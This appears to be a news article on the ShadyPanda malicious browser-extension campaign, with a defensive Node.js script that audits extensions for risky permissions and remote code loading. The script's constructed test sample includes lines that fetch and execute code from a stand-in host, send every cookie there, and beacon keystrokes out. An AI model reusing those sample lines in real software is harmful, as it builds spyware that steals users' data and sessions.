4.3 Million Browsers Infected: Uncovering ShadyPanda's 7-Year Malware Campaign
2025/12/03


Security firm Koi.ai has disclosed ShadyPanda's 7-year malware campaign, infecting over 4.3 million Chrome and Edge users, involving well-known extensions like Clean Master.


Summary: Recently, security firm Koi.ai released a bombshell report exposing a threat group named ShadyPanda. Over the past 7 years, this group has infected more than 4.3 million users by distributing malicious browser extensions through Chrome and Edge stores. The report indicates that multiple well-known extensions, including Clean Master, have been used as spyware to collect sensitive data such as user browsing history, search records, and even cookies.

ShadyPanda Campaign Overview


7 Years of Planning, 4 Phases

According to Koi.ai researcher Tuval Admoni, ShadyPanda's attack activities can be traced back 7 years, with strategies continuously evolving from simple ad fraud to comprehensive browser monitoring.

Phase 1: The "Wallpaper and Productivity Tools" Scam (2023)

Initially, ShadyPanda released 145 extensions disguised as wallpaper or productivity tools (mainly in the Edge store). These extensions profited through affiliate fraud: when a user visited a shopping site such as Amazon or eBay, the extension quietly rewrote product links to carry the attackers' affiliate code, so that any purchase earned them a commission. Although not technically sophisticated, this taught the operators two lessons they would rely on later: users trust extensions with high install counts, and store review concentrates on the initial submission, so a benign extension that turns malicious in a later update is rarely re-examined.

[Image: Phase 1: Wallpaper Hustle]

Phase 2: Search Hijacking (Early 2024)

Subsequently, the attackers became bolder. Certain new tab extensions began hijacking users' search traffic, redirecting it to known hijacking sites such as trovi.com. More seriously, they started collecting users' search queries (captured keystroke by keystroke, before the user pressed Enter) and the cookies of specific domains, sending the data to the attackers' servers.

[Image: Phase 2: Search Hijacking]

Phase 3: The Long Game

This phase was the most deceptive. ShadyPanda acquired or developed 5 extensions including Clean Master, allowing them to operate legitimately for years, accumulating hundreds of thousands of users, and even earning "Featured" and "Verified" badges from stores.

Only in mid-2024 did the attackers push malicious code through the stores' automatic update mechanism. The update implanted a Remote Code Execution (RCE) backdoor: every hour the extension downloaded JavaScript from a control server and executed it. Because the payload is fetched at runtime rather than shipped in the reviewed package, the attackers could change the extension's behavior at any time without submitting another update, pivoting from monitoring to ransomware or credential theft.

[Image: Phase 3: The Long Game]

Phase 4: The Spyware Empire (4 Million+ Users)

This is currently the most impactful phase. The report indicates that 5 other extensions operated by ShadyPanda in the Edge store (including extensions with millions of users) are actually powerful spyware.

These extensions are accused of collecting and exfiltrating the following data:

  • Complete browsing history: Every URL visited.
  • Search queries: Recording every user search.
  • Page interactions: Mouse click coordinates, dwell time, etc.
  • Browser fingerprints: Screen resolution, User Agent, timezone, etc.
  • Cookies and storage data: The extensions hold permissions to read every cookie and local storage entry in the browser.

According to the report, this data was sent both to servers located in China and to Google Analytics.

[Image: Phase 4: Spyware Empire]


User Community Response

This incident has sparked strong reactions across major tech communities. Many long-term users expressed shock and anger, while others began searching for alternatives.

In the Linux.do community, users expressed concerns about data breaches:

"I spent so long customizing everything, and now it's all gone! Malicious plugins I**" —— Acheron

"Got hit, don't know what exactly was stolen" —— hjie

On V2EX, users also posted:

"Can't laugh about this, been using a new tab page for years, suspected to be poisoned"

Users in the NodeLoc community expressed relief at not being affected and reminded each other to stay vigilant about security.

These authentic voices reflect users' concern for privacy and security, as well as disappointment at being "backstabbed" by tools they once trusted.

Technical Details and Harm

The report provides detailed analysis of ShadyPanda's technical methods:

  • RCE Backdoor: Infected extensions check in with api.extensionplay[.]com on a schedule, downloading obfuscated JavaScript and executing it inside the extension.
  • Anti-Analysis: The malicious code detects whether developer tools are open, and if it sees signs of debugging it suspends its malicious activity, so a dynamic analysis run with DevTools open observes nothing.
  • Man-in-the-Middle Attack Capability: From its background service worker and content scripts, a malicious extension can intercept and modify network traffic. Because the extension runs inside the browser, after TLS has been terminated, HTTPS offers no protection: an extension with host permissions on a site can read and inject content into that site's pages regardless of the connection being encrypted.
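The indicators above, together with the permission abuse in Phase 4, the hourly remote code loading in Phase 3, the search redirection in Phase 2 and the link rewriting in Phase 1, are all things a reviewer can look for statically before trusting an extension. The following Node.js script is an added example, not code from Koi.ai, BoTab or any ShadyPanda extension; it audits a manifest plus script sources for those indicators. Both sample extensions, the c2.example host and the affiliate tag are constructed; trovi.com is the hijack destination named on this page.

```javascript
// Static triage of a browser-extension package for the indicators this page describes:
// broad permissions (Phase 4), periodic remote code loading (Phase 3), search hijacking
// (Phase 2), affiliate link rewriting (Phase 1) and devtools evasion. Added example; not
// Koi.ai's or BoTab's code. Every input below is constructed; c2.example is a placeholder host.

const SENSITIVE_PERMISSIONS = {
  cookies: 'can read every cookie the user has',
  history: 'can read the full browsing history',
  webRequest: 'can observe network requests',
  webRequestBlocking: 'can modify or block requests in flight',
  declarativeNetRequest: 'can redirect requests (search hijacking)',
  tabs: 'can read the URL and title of every open tab',
  scripting: 'can inject scripts into pages',
  '<all_urls>': 'host access to every site the user visits',
};

// Hijack destination named on this page; extend with your own threat intel.
const KNOWN_HIJACK_HOSTS = ['trovi.com'];

// Each indicator is a regex over source text plus the reason it matters. Several are
// benign on their own; the combinations checked in scanSource drive the verdict.
const SOURCE_INDICATORS = [
  { id: 'remote-fetch', re: /fetch\s*\(\s*['"`]https?:\/\//, why: 'fetches from a hard-coded remote host' },
  { id: 'dynamic-eval', re: /\beval\s*\(|new\s+Function\s*\(/, why: 'executes code assembled at runtime' },
  { id: 'periodic-alarm', re: /chrome\.alarms\.create\s*\([^)]*periodInMinutes/, why: 'schedules recurring background work' },
  { id: 'devtools-check', re: /outerWidth\s*-\s*(window\.)?innerWidth|\bdebugger\b/, why: 'tests whether devtools are open (anti-analysis)' },
  { id: 'keystroke-capture', re: /addEventListener\s*\(\s*['"](keydown|keyup|input)['"]/, why: 'captures typed input before submission' },
  { id: 'cookie-dump', re: /chrome\.cookies\.getAll\s*\(/, why: 'enumerates cookies programmatically' },
  { id: 'affiliate-rewrite', re: /\.href\s*=[^;]*[?&]tag=/, why: 'rewrites link targets with an affiliate tag' },
];

function auditManifest(manifest) {
  const findings = [];
  // MV2 lists host patterns under permissions, MV3 under host_permissions; check both.
  const granted = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of granted) {
    if (SENSITIVE_PERMISSIONS[p]) findings.push({ id: 'perm:' + p, why: SENSITIVE_PERMISSIONS[p] });
  }
  if (manifest.manifest_version < 3) {
    findings.push({ id: 'manifest-v2', why: 'MV2 has no policy block on remotely hosted code' });
  }
  const csp = manifest.content_security_policy;
  if (/unsafe-eval/.test(typeof csp === 'string' ? csp : JSON.stringify(csp || {}))) {
    findings.push({ id: 'csp:unsafe-eval', why: 'CSP re-enables eval in extension pages' });
  }
  return findings;
}

function scanSource(code) {
  const findings = SOURCE_INDICATORS.filter(i => i.re.test(code)).map(({ id, why }) => ({ id, why }));
  for (const host of KNOWN_HIJACK_HOSTS) {
    if (code.includes(host)) findings.push({ id: 'hijack:' + host, why: 'references a known search-hijack destination' });
  }
  const ids = new Set(findings.map(f => f.id));
  // The Phase 3 backdoor pattern: pull JavaScript from a remote host and execute it.
  if (ids.has('remote-fetch') && ids.has('dynamic-eval')) {
    findings.push({ id: 'remote-code-loading', why: 'downloads and executes remote JavaScript; behaviour can change without a store update' });
  }
  return findings;
}

function triage(extension) {
  const findings = auditManifest(extension.manifest);
  for (const [file, code] of Object.entries(extension.scripts || {})) {
    for (const f of scanSource(code)) findings.push({ ...f, file });
  }
  const ids = findings.map(f => f.id);
  let verdict = 'low';
  if (ids.includes('remote-code-loading') || ids.some(id => id.startsWith('hijack:'))) verdict = 'high';
  else if (findings.length >= 3) verdict = 'medium';
  return { verdict, findings };
}

// Constructed sample modelled on the behaviour described in Phases 1-4 (not a real extension).
const SUSPICIOUS = {
  manifest: {
    manifest_version: 3,
    name: 'Sample New Tab (constructed)',
    permissions: ['cookies', 'history', 'alarms', 'storage'],
    host_permissions: ['<all_urls>'],
  },
  scripts: {
    'background.js': `
      chrome.alarms.create('sync', { periodInMinutes: 60 });
      chrome.alarms.onAlarm.addListener(async () => {
        const r = await fetch('https://c2.example/payload.js');
        new Function(await r.text())();
      });
      chrome.cookies.getAll({}, c => fetch('https://c2.example/c', { method: 'POST', body: JSON.stringify(c) }));
    `,
    'content.js': `
      if (window.outerWidth - window.innerWidth > 160) { /* devtools open: go quiet */ }
      document.addEventListener('keydown', e => navigator.sendBeacon('https://c2.example/k', e.key));
      for (const a of document.querySelectorAll('a[href*="amazon."]')) a.href = a.href + '?tag=aff-placeholder';
    `,
  },
};

// Constructed sample: a bookmark new-tab page that asks only for what it needs.
const BENIGN = {
  manifest: { manifest_version: 3, name: 'Sample Bookmarks Tab (constructed)', permissions: ['storage', 'bookmarks'] },
  scripts: { 'newtab.js': `chrome.bookmarks.getTree(tree => render(tree));` },
};

console.log(JSON.stringify(triage(SUSPICIOUS), null, 2));
console.log('benign verdict:', triage(BENIGN).verdict);
```

Run it with `node triage.js`. The verdict is a triage aid, not proof: a legitimate extension may fetch JSON and call `new Function` for templating, so treat `remote-code-loading` as a reason to read the code rather than a conviction. A clean result at install time also says nothing about a later update, which is exactly how Phase 3 worked; re-run the audit on each new version of an unpacked extension, loading `manifest.json` and the scripts it references from the CRX directory.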

Official Response and Controversy

In response to Koi.ai's allegations, the WeTab and Infinity teams quickly released response statements (see Official Statement).

The teams stated:

  1. Clean Master Chrome version was sold to a third party long ago, and subsequent malicious updates are unrelated to the original team.
  2. WeTab and Infinity are independently operated products with code different from Clean Master, containing no backdoors or malicious monitoring.
  3. Extensions were removed because they used the same developer account as Clean Master and were "guilty by association," not because the products themselves contained malicious code.
  4. Collected data is only used for basic product functions (such as syncing, statistics), does not involve privacy, and the teams have invited third-party organizations to conduct security audits.

Reference sources: Koi.ai Blog, BleepingComputer, V2EX Discussion
